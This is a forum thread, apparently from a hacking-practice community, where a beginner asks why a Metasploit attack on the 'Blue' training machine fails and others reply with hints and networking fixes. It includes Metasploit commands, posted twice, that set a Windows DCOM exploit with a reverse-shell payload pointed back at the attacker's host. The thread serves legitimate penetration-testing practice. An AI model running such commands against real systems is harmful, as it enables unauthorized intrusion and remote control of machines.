Blue and Metasploit reverse shell

Hi guys! I’m attempting to do my first pen test with Blue machine(10.10.10.40). I’ve searched on google how to open that os (scanned with nmap) and i’ve tryed with these commands:

msf > use exploit/windows/dcerpc/ms03_026_dcom
msf > set RHOST 10.10.10.40
msf > set PAYLOAD generic/shell_reverse_tcp
msf > set LHOST my_ip
msf > exploit

Actually metasploit has launch correctly the exploit but finally it saids:
"Exploited was completed but no sessions was created ".

What’s wrong?
Thank you to everyone!

remember recent leaks

@peek said:
remember recent leaks

Oh… I really don’t know, i’m searching vulnerabilities or exploits for this kinda of OS and open ports but i’m just finding to use the same metasploit’s exploit (ms03_026_dcom) but it’s not working… Sorry but i’m really noob, i need an help for my first pen test…

Thats because you are using wrong exploit.

Like @peek said, research for some recent and critical

you have a huge hint if you read carefully that box

yer man your on the right track. just take more notice of all that in provided.

you good and well may fun into trouble with the exploit that does work as well, i had to reset the box and hammer it as soon as it came back up just cause it seems theres a lot of people hitting it, but as others have said, read carefully to target the correct exploit

Machine name combine with OS is a big hint . try using nmap script properly you will get the idea easily

@Saylar said:
Hi guys! I’m attempting to do my first pen test with Blue machine(10.10.10.40). I’ve searched on google how to open that os (scanned with nmap) and i’ve tryed with these commands:

msf > use exploit/windows/dcerpc/ms03_026_dcom
msf > set RHOST 10.10.10.40
msf > set PAYLOAD generic/shell_reverse_tcp
msf > set LHOST my_ip
msf > exploit

Actually metasploit has launch correctly the exploit but finally it saids:
"Exploited was completed but no sessions was created ".

What’s wrong?
Thank you to everyone!

Check a more latest version of the similar exploit you are trying to use. DM me if you need more instructions as i do not want to give out spoilers

Guys finally i’ve found the right “Blue” exploit, i’ve setted the rhost but it still doesn’t work. It still fail!
Any tip (in private too)? :frowning:
Thank you to all!

UPDATE: Mmm i’ve no setted any payload, should i? Uff i’m too noob :frowning:

@Saylar said:
Guys finally i’ve found to use xxxxxxxxxxxx, […]

There might be a big spoiler.

@ms1028 said:

@Saylar said:
Guys finally i’ve found to use xxxxxxxxxxxx, i’ve setted the rhost but it still doesn’t work. This is the new error: “Unable to Negotiate with remote host, SMB1 may be disabled”.
Any tip? :frowning:
Thank you to all!

UPDATE: Mmm i’ve no setted any payload, should i? Uff i’m too noob :frowning:

There might be a big spoiler.

Yeah you got reason, i’m sorry, i’ve modified it!

UPDATE: So… it should be all right… I’m running Kali on VM (with NAT network) could be this the reason why the exploit is not correctly running?

  1. Set the payload
  2. Set your VPN IP as LHOST. Check the ifconfig output, look for smth like tun0. You will see 10.10.X.X IP, use it

no offense intended, but i had someone else recommend this Kali book to me when i was nice and fresh - https://goo.gl/k1essZ - that gave a perfect into into getting my first shells, highly recommend that way you know whats going on there and why its failing

I owned blue but I don’t know how to get the points?

did you find the flag and put the hash in on the machines page?

I’m using the right exploit (hard to miss) but I’m getting


Connecting to target for exploitation.
RubySMB::Error::UnexpectedStatusCode: STATUS_DUPLICATE_NAME

I’m running from a vritualbox, exploit options should be set correctly…
Any ideas what’s going on?

@kirov said:
I’m using the right exploit (hard to miss) but I’m getting


Connecting to target for exploitation.
RubySMB::Error::UnexpectedStatusCode: STATUS_DUPLICATE_NAME

I’m running from a vritualbox, exploit options should be set correctly…
Any ideas what’s going on?

Yes man, i just know that when i was using VB it didn’t work. So i burned a kali’s iso image on a USB Key and now i ran it as live os + persistent and now it works!